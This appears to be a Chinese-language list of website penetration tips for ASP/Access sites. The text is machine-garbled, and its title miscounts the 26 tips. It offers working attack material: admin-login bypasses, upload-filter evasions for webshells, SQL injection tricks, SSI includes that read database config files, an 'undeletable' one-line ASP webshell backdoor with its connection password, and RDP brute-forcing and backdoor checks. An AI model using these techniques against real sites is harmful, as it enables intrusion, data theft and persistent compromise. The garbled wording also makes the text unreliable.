ACCESS总结16种网站渗透技巧经验分享

1.行使网站过滤不严直接绕了后台验证,在网站后长 admin/session.asp 或
admin/left.asp

2.有底网站上后台会面世一个剧本提示框,输入:administrator
即可突破!因为admin代表以管理人身份上的意。

3.有的网站开始了3389,入侵之前先行去老是3389,尝试弱口令或是爆破,再者就是据5次shift键,看看发生无前人装了后门,然后再社工密码。

4.来时光进后台会弹出提示框“请登陆”,把地方抄写出来(复制不了),然后放在网页源代码分析器里,选择浏览器-拦截跳转勾选–查看即可进入后台!

5.突破防盗链访问webshell,代码:javascript:document.write(“<a
href=’http://www.xxx.com/uploadfile/1.asp’&gt;fuck&lt;/a&gt;”)
 回车后点击GO即可登webshell

6.突破一流信息监控拦截系统访问,当小马可以看,上传大马却死的当儿,可以优先用大马跟同样布置图片合并,在上传合并后底图样,接着数据库备份后走访即可!

7.在以编辑器的shell时,有时加了asp|asa|cer|php|aspx等扩大名上传时都于过滤了,其实只要多aaspsp
上传asp就会见突破了。

8.奇迹啊D猜出表段了,但是猜不交字段的时候,可以交后台查看源文件,搜索ID或type,一般还能够找到,再到啊D里补充加配段进展猜解内容即可突破。

9.社工后台密码可据此这技术,假如网站域名是:www.baidu.com
管理员称为admin,可以尝试密码“baidu”和“baidu.com”来登陆。

10.手工注入时如果网站过滤了 and 1=1   and 1=2 ,可以据此xor 1=1   xor 1=2
进行判断。

11.当地构造上传一模一样句子话木马,如果提示“请先选择你若达污染之公文![ 重新上传
]”
,说明文件太小了,用记事本打开再复制多几乎句话从而扩大文件大小,再上传即可。

12.用啊d跑表,跑字段名name和pass出无来,显示长度逾50呀的,猜解不起之景况下,这时在穿山甲去跑一般还能够走出去!

13.猜组织者后台小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp
会现出菜单导航,然后迅雷下载全部链接。

14.明亮表名,字段,使用SQL语句以ACCESS数据库被加个用户名及密码语句子:Insert
into admin(user,pwd) values(‘test’,’test’)

15.当获管理员密码,却拿不顶管理员的帐号时,到前台随便打开一个消息,找找诸如“提交者”“发布者”之类的字眼,一般“提交者”就是组织者的帐号了。

16.爆破ASP+IIS架设的网站web绝对路径,假要网站主页也:http://www.xxxxx/index.asp/
提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源码的利用,很多网站因此底且是网上下载的源码,有的站长很疲劳,什么呢非更改,然后便上传开通网站了,我们可去下充斥同效仿,里面来诸多默认的音信值得以。

18.将以下代码上传到webshell里,后缀是asp,就算别人发现了呢去不了,算是超级防删的同一句子话木马了,可以充分安全之留个后门,菜刀连接密码:x

 

        

<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

  

19.当排解出帐号密码却招来不顶后台的下,可以尝尝链接ftp,假如域名是:www.baidu.com
“ 得到的密码为“bishi”,我们就是得试下用“xxxx”“xxxx.cn”www.xxxx.cn作为FTP
用户称,用“bishi”:作为FTP密码来进展登陆,成功之几带队得以充分老的啊!ftp的默认端口:21
 默认帐号密码:test

20.有的后台不出示验证码,难道就是没法登录了么?
其实把同段子代码导入注册表里就足以突破这困境了,把脚的代码保存也Code.reg,双击导入就可了!

 

      

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

  

21.当网站不同意上传
asp、asa、php等公事时,我们可上传一个stm文件,代码为“<!–#include
file=”conn.asp”–>”
 
(想查什么文件就形容啊文件称,这里自己借设想查看“conn.asp”),然后直接打开这个stm文件之地点,再查看源代码,“conn.asp”这个文件之代码就旗帜鲜明了!

22.当网站不同意上传ASP,CGI,CER,CDX,HTR等品种的文件时,尝试上污染一个shtm文件,内容吧:<!–#includ
file=”conn.asp”–>
倘达到污染成,那不过好了,访问地址便得浏览conn.asp里的内容了,这样一来,数据库路径也就算顶手啊!

23.手工检测注入点弹有“你的操作都受记录!”之类的消息,访问是文件:sqlin.asp,如果有,在注入点后面栽入一句话木马:‘excute(request(“TNT”))
随后用同样词话木马客户端连接:http://www.xxx.com/sqlin.asp,上传木马即可拿下shell,因为很多防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库。

24.旁注的话,肯定是挑支持aspx的站点来天了,问题是安判断也?方法很简短,在以网站背后长xxx.aspx,如果回去“/”应用程序中之服务器错误,无法找到该资源,404画面就证明支持aspx木马。

25.网站后面加test.php 可以查看版本

26.禁避讳这简单独网站后台文件 admin_index.asp  manage_login.asp

相关文章